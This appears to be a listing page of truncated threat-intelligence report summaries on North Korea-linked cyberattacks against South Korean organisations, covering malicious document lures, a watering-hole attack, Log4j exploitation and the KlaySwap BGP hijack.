296 reports
ASEC analyzed a malicious Word document disguised as a product introduction that appeared to target South Korean logistics or shopping-related organizations. The document reused metadata and macro-enablement lures from a prior information-theft Word campa…
When users were on the cryptocurrency exchange, their browsers would load Kakao’s javascript library directly from Kakao’s servers at the following URL (see diagram): It was actually this URL that was the attacker’s target, not any of the resources operat…
Kimsuky is assessed in the excerpt as a North Korea-backed APT focused on information theft, with 2021 activity continuing against defense, diplomacy, unification-related personnel, and reported energy and aerospace victims in South Korea. The group shift…
ESRC describes a North Korea-linked attack in South Korea that disguised malware as a hospital or medical institution health-check certificate issuance program. The installer combined a legitimate hospital certificate plugin with an encrypted backdoor res…
ASEC observed a malicious Hangul document distributed ahead of South Korea's 20th presidential election, disguised as a National Election Commission press release about shipboard voting. ASD telemetry indicated the HWP used an embedded OLE object to run a…
Hauri reported a macro-based malware document disguised as materials for an online expert roundtable about Korean nuclear armament. The brief source notes that when the macro runs, it collects user information and downloads additional malware for follow-o…
The 2022 UN Panel of Experts report says North Korea continued missile and nuclear development, including new short and possibly medium range missile testing, while seeking foreign material, technology, and know-how. The report identifies cyber activity, …
Huntress investigated targeted DPRK-backed APT activity against a nuclear or national-security think tank environment and identified BABYSHARK tradecraft in the intrusion. The actor maintained persistence through a scheduled task named GoogleUpdater that …
ESRC reports repeated North Korea-linked spear-phishing attempts against South Korean diplomacy, security, defense, unification, academic, and private-sector experts. The attackers sent a password-protected malicious Word document disguised as a profile f…
KISA described a targeted watering-hole attack in which a compromised Korean website redirected visitors through malicious scripts and IP filtering before delivering malware via software vulnerability exploitation. The attack chain included initial access…
ESRC identified a malicious Word document distributed as a Klip digital asset wallet customer-center notice, using the filename '[Klip Customer Center] Wrong Token Transfer Resolution Guide.doc'. The document used protected-content social engineering to p…
Google Cloud Threat Horizons described sustained Internet-wide scanning and exploitation attempts against vulnerable Apache Log4j instances after the December 2021 disclosure. Observed payload delivery heavily targeted ports 80 and 443 while using LDAP li…
Watch Part 1 and Part 2 of our Crypto Crime webinar series. Want more insights into the 2020 State of Crypto Crime? Our latest report has original research and case studies on the trends shaping law enforcement and compliance for cryptocurrency in 2020, i…
S2W analyzed the KlaySwap incident as a BGP hijacking operation that redirected traffic for Kakao SDK delivery paths toward attacker-controlled infrastructure. The attacker issued a ZeroSSL certificate for developers.kakao.com, served a malicious kakao.mi…
AhnLab attributed a spear-phishing attempt against a university professor to Kimsuky, using a malicious Word document disguised as manuscript requirements for a North Korea-related publication. The document contained macros that downloaded Visual Basic Sc…